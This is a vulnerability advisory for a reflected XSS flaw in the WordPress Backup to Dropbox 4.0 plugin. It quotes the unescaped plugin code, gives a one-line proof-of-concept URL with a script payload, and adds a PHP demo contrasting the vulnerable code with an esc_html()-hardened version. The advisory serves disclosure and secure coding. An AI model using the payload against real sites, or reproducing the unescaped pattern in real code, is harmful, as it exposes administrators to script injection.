WordPress Backup to Dropbox 4.0 Reflected XSS

Homepage:

https://wordpress.org/plugins/wordpress-backup-to-dropbox/

CVE-ID

CVE-2014-9310

CVSS Score

4

CVSS Vector

(AV:N/AC:L/Au:S/C:P/I:N/A:N)

Description:

The view Views/wpb2d-premium.php is rendered by the admin submenu page ?page=backup-to-dropbox-premium, which is registered for users holding the activate_plugins capability:

File: wordpress-backup-to-dropbox\wp-backup-to-dropbox.php

add_submenu_page('backup-to-dropbox', $text, $text, 'activate_plugins', 'backup-to-dropbox-premium', 'backup_to_dropbox_premium');
function backup_to_dropbox_premium()
{
    wp_enqueue_script('jquery-ui-core');
    wp_enqueue_script('jquery-ui-tabs');

    $uri = rtrim(WP_PLUGIN_URL, '/') . '/wordpress-backup-to-dropbox';
    include 'Views/wpb2d-premium.php';
}

In that view the title request parameter is concatenated directly into the HTML of a settings message; $_REQUEST['title'] is not escaped, so its value is reflected into the admin page unchanged:

File: wordpress-backup-to-dropbox\Views\wpb2d-premium.php

if (isset($_REQUEST['title'])) {
    add_settings_error('general', 'wpb2d_premium_success', sprintf(__('You have succesfully purchased %s.', 'wpbtd'), "<strong>{$_REQUEST['title']}</strong>"), 'updated');
}

Proof of Concept:

The reflected script executes in the browser of the administrator who opens the following URL:

http://wordpress-install/wp-admin/admin.php?page=backup-to-dropbox-premium&title=<script>alert(String.fromCharCode(88,83,83));</script>
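
As an added illustration (not the plugin's own code or the vendor's patch), the message construction from wpb2d-premium.php next to a hardened version that escapes the parameter with esc_html() before it is placed in markup. The stubs for __() and esc_html() are only stand-ins so the file runs outside WordPress, and the request array is a constructed input mirroring the proof of concept.

```php
<?php
// Stand-ins for the WordPress functions used below, defined only when
// WordPress is not loaded. esc_html() is approximated with htmlspecialchars().
if (!function_exists('__')) {
    function __($text, $domain = 'default') { return $text; }
}
if (!function_exists('esc_html')) {
    function esc_html($text) {
        return htmlspecialchars((string) $text, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    }
}

// Vulnerable pattern: the raw request value is interpolated into HTML,
// so a value such as <script>...</script> becomes live markup.
function wpb2d_message_vulnerable(array $request)
{
    if (!isset($request['title'])) {
        return null;
    }
    return sprintf(__('You have succesfully purchased %s.', 'wpbtd'),
        "<strong>{$request['title']}</strong>");
}

// Hardened pattern: the value is escaped for an HTML text context before
// it is wrapped in <strong>, so angle brackets are rendered as text.
function wpb2d_message_hardened(array $request)
{
    if (!isset($request['title'])) {
        return null;
    }
    return sprintf(__('You have successfully purchased %s.', 'wpbtd'),
        '<strong>' . esc_html($request['title']) . '</strong>');
}

// Constructed input: the same kind of value the proof of concept supplies.
$request = array('title' => '<script>alert(1)</script>');
echo "vulnerable: ", wpb2d_message_vulnerable($request), PHP_EOL;
echo "hardened:   ", wpb2d_message_hardened($request), PHP_EOL;
```

Running the file prints the vulnerable message with the script tag intact and the hardened message with it entity-encoded; the same escaping should be applied to any request value that ends up in a settings error or notice.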

Timeline: